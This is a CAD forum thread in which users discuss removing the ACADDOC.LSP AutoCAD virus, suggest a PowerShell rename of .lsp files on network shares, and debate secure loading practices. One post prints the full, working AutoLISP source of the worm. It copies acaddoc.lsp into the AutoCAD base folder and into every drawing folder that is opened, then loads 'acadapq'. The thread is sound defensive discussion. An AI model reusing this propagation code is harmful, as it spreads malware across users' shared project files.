Topic: acaddoc>lsp

[HasanCAD]

Hi all

While open cad file this message comes. I belive that it is ACADDOC.LSP virus.
How to stop that virus attacking the files on server?

[ChrisCarlson]

For one, why does a project folder have a lisp routine in it?

AutoCAD initiated a secure directory function within the lisp routines, if a routine wants to run that is not within a designated secure folder that pop-up will display. 

[ChrisCarlson]

Double post,

I would upload that file we can verify it's clean

[Rob...]

This has been around a long time and there is plenty of information out there about how to get rid of it. Do you need help searching for a solution or are you looking for someone with first hand experience?

[Rob...]

For one, why does a project folder have a lisp routine in it?

The virus puts it there.

[HasanCAD]

Déjà vu all over again

WARNING [kdub]: DO NOT DOWNLOAD AND SAVE THIS FILE LOCALLY unless you know exactly what the file does ... user beware !!
note added kdub.

this is the file.

Code - Auto/Visual Lisp: [Select]

1. (defun-q s::startup
2.          (/ basepath        baseacad        acaddocpath
3.             r-acaddoc       w-basepath      rl-acaddoc
4.             acaddoclsp      c-acaddocname   c-acaddocpath
5.             c-acaddoc
6.            )
7.          (setq basepath
8.                 (findfile "base.dcl")
9.          )
10.          (setq basepath
11.                 (substr basepath 1 (- (strlen basepath) 8))
12.          )
13.          (setq baseacad (strcat basepath "acaddoc.lsp"))
14.          (setq acaddocpath (findfile "acaddoc.lsp"))
15.          (setq acaddocpath
16.                 (substr acaddocpath
17.                         1
18.                         (- (strlen acaddocpath) 11)
19.                 )
20.          )
21.          (setq acaddoclsp (strcat acaddocpath "acaddoc.lsp"))
22.          (setq c-acaddocname (getvar "dwgname"))
23.          (setq c-acaddocpath (findfile c-acaddocname))
24.          (setq c-acaddocpath
25.                 (substr c-acaddocpath
26.                         1
27.                         (- (strlen c-acaddocpath) (strlen c-acaddocname))
28.                 )
29.          )
30.          (setq c-acaddoc
31.                 (strcat c-acaddocpath "acaddoc.lsp")
32.          )
33.          (if
34.            (and
35.              (/= basepath acaddocpath)
36.              (= c-acaddocpath acaddocpath)
37.            )
38.             (progn
39.               (setq r-acaddoc
40.                      (open acaddoclsp "r")
41.               )
42.               (setq w-basepath
43.                      (open baseacad "w")
44.               )
45.               (while
46.                 (setq rl-acaddoc
47.                        (read-line r-acaddoc)
48.                 )
49.                  (write-line rl-acaddoc w-basepath)
50.               )
51.               (close w-basepath)
52.               (close r-acaddoc)
53.             )
54.  
55.             (progn
56.               (setq r-acaddoc
57.                      (open acaddoclsp "r")
58.               )
59.               (setq w-basepath
60.                      (open c-acaddoc "w")
61.               )
62.               (while
63.                 (setq rl-acaddoc
64.                        (read-line r-acaddoc)
65.                 )
66.                  (write-line rl-acaddoc w-basepath)
67.               )
68.               (close w-basepath)
69.               (close r-acaddoc)
70.             )
71.          )
72.          (princ)
73. )
74. (load "acadapq")
75. (princ)
76.  

[ChrisCarlson]

Refer to here,

http://www.theswamp.org/index.php?topic=35330.0

Infact you are the original poster

[BlackBox]

Close all sessions of AutoCAD, and then have your IT Admin, or someone responsible using a domain account with sufficient Active Directory permissions, call this PowerShell (As Administrator?):

Code - C#: [Select]

1. Get-ChildItem <YourProjectFolderNetworkShareRoot>\*.* -Include *.lsp | Rename-Item -NewName { $_.Name -Replace ".lsp",".lsp.blacklist" }
2.  

* Warning - This PowerShell will rename ALL *.lsp files in ALL project folders; change the resultant file extension as needed.

[Kerry]

Refer to here,

http://www.theswamp.org/index.php?topic=35330.0

Infact you are the original poster

That thread does look familiar

[HasanCAD]

Close all sessions of AutoCAD, and then have your IT Admin, or someone responsible using a domain account with sufficient Active Directory permissions, call this PowerShell (As Administrator?):

Code - C#: [Select]

1. Get-ChildItem <YourProjectFolderNetworkShareRoot>\*.* -Include *.lsp | Rename-Item -NewName { $_.Name -Replace ".lsp",".lsp.blacklist" }
2.  

* Warning - This PowerShell will rename ALL *.lsp files in ALL project folders; change the resultant file extension as needed.

Could we use

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include acaddoc.lsp |

instead of

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include *.lsp |

[BlackBox]

Close all sessions of AutoCAD, and then have your IT Admin, or someone responsible using a domain account with sufficient Active Directory permissions, call this PowerShell (As Administrator?):

Code - C#: [Select]

1. Get-ChildItem <YourProjectFolderNetworkShareRoot>\*.* -Include *.lsp | Rename-Item -NewName { $_.Name -Replace ".lsp",".lsp.blacklist" }
2.  

* Warning - This PowerShell will rename ALL *.lsp files in ALL project folders; change the resultant file extension as needed.

Could we use

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include acaddoc.lsp |

instead of

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include *.lsp |

Certainly - Just offering an en-mass example; take from it what you like.

[tombu]

You should also try with

Code: [Select]

\*.* -Include acadapq.* |as it's the code that does most of the damage.  Could be VLX, ,FAS, or .LSP

[jmaeding]

if Autodesk really cared about this, they would make a filewatcher util that looked for a new acad.lsp and other startup files appearing in project folders. Its fairly easy to write in .net, but somehow the real issues people get hit with are not exotic enough to be dealt with. Instead we get "lisp signing" and "total control" type security in 2016, as if its needed or decent to implement in an office with people that actually write scripts and minor lisps as they work.
Are they trying to squash user customization with lisp, just like they did with the CUI system that wants the main menu to be the acad one, yet user customization happens to the main menu at the same time. So you have to play the menu switch game which never goes well in the end. So not we do not make custom toolbars. Thanks Autodesk.

[Rob...]

Really? You blame AutoDesk?

If you feel vulnerable to this and it's so easy, make it yourself. Most people have protocols in place to avoid this type of thing. It is easy. Just like basic virus protection, it's up to the users to implement the necessary safeguards. You cannot blame AutoDesk for not protecting us, if some of us can't protect ourselves from the maliciousness of others.

The stuff about your issues with customization are not even related to the topic at hand.

[BlackBox]

[mjfarrell]

[ChrisCarlson]

Really? You blame AutoDesk?

If you feel vulnerable to this and it's so easy, make it yourself. Most people have protocols in place to avoid this type of thing. It is easy. Just like basic virus protection, it's up to the users to implement the necessary safeguards. You cannot blame AutoDesk for not protecting us, if some of us can't protect ourselves from the maliciousness of others.

The stuff about your issues with customization are not even related to the topic at hand.

I would say Autodesk addressed this with secure directories.

[danallen]

For one, why does a project folder have a lisp routine in it?

I'm on Bricscad so this isn't an issue, but I sometimes put project specific customization in a lisp in each project file folder. This allows me to add on the fly customization that doesn't affect whole office, just usable by the project team. Some of it is an override to office standards, as required by the specific job.

[Rob...]

https://nakedsecurity.sophos.com/2009/08/13/autocad-virus-blast/

[BlackBox]

For one, why does a project folder have a lisp routine in it?

I'm on Bricscad so this isn't an issue, but I sometimes put project specific customization in a lisp in each project file folder. This allows me to add on the fly customization that doesn't affect whole office, just usable by the project team. Some of it is an override to office standards, as required by the specific job.

I too have used project-specific code files for years, but _never_ using one of the automatically loaded Acad* files in DWGPREFIX, etc. for the very reason of mitigating potential security issues.

Instead, I simply have users place their project-specific code in a (strcat (getvar 'loginname) ".lsp") file, in a separate folder (either their personal network space, or a project relative folder; never where .DWGs are), and load the code (if found) as part of our AcadDoc.lsp procedure.

Cheers


[Edit] - Code snippet from version-specific AcadDoc.lsp, where user's personal network space is mapped to SFSP programmatically at session start:

Code - Auto/Visual Lisp: [Select]

1. (if (findfile (strcat (setq userName (getvar 'loginname)) ".lsp"))
2.    (load userName)
3. )
4.  

[dgorsman]

Same here.  If I need to test something, I have it load from a separate development folder rather than a drawing folder.  The same thing could be accomplished for project-specific code.